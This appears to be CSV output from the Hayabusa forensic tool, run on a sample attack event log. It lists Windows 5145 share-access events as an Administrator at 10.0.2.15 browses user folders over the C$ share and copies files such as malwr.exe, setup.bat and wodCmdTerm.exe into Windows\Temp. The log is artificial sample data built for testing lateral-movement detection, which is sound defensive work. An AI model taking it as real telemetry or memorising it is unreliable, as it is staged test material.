2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:26.981 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: malwr.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:26.981 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: malwr.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:27.061 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: malwr.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:27.071 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: malwr.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:27.081 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ui\SwDRM.dll | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:27.081 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: malwr.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:45.488 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:45.548 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:45.548 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:47.721 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:47.721 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:56.403 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:56.414 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\AppData | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:58.386 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:04.105 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Fonts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Media\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:07.249 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:07.249 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:07.529 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:07.630 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:07.700 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:09.913 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\setup.bat | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:09.913 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\setup.bat | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:09.923 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:09.933 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\wodCmdTerm.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
